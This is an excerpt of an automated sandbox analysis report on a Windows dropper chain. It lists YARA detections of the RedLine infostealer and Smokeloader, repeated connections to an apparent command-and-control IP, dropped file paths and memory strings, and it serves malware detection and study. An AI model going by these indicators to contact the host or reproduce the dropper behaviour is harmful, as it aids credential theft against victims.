                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.30

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.con1332.exe.2c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 1.3.kino0095.exe.4d2a220.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2c00e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4c10000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.2.con1332.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4c10000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.3.dvL76s65.exe.2c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 1.3.kino0095.exe.4d2a220.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00403BA20_2_00403BA2
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00405C9E0_2_00405C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B3BA21_2_010B3BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B5C9E1_2_010B5C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00963BA22_2_00963BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00965C9E2_2_00965C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00193BA23_2_00193BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00195C9E3_2_00195C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00408C6013_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040DC1113_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00407C3F13_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00418CCC13_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00406CA013_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004028B013_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041A4BE13_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041824413_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040165013_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00402F2013_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004193C413_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0041878813_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00402F8913_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00402B9013_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004073A013_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF2B1713_2_02BF2B17
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF18B713_2_02BF18B7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF786D13_2_02BF786D
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C089EF13_2_02C089EF
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF318713_2_02BF3187
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF31F013_2_02BF31F0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF7EA613_2_02BF7EA6
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF8EC713_2_02BF8EC7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BFDE7813_2_02BFDE78
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF77D913_2_02BF77D9
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF6F0713_2_02BF6F07
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C0A72513_2_02C0A725
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C08F3313_2_02C08F33
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C084AB13_2_02C084AB
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF2DF713_2_02BF2DF7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_046B0DB013_2_046B0DB0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_046B0B7813_2_046B0B78
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe 319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB
                      Source: szDGo5lHdI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.con1332.exe.2c20000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 1.3.kino0095.exe.4d2a220.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2c00e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4c10000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4c10000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.3.dvL76s65.exe.2c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 1.3.kino0095.exe.4d2a220.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00401F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00401F90
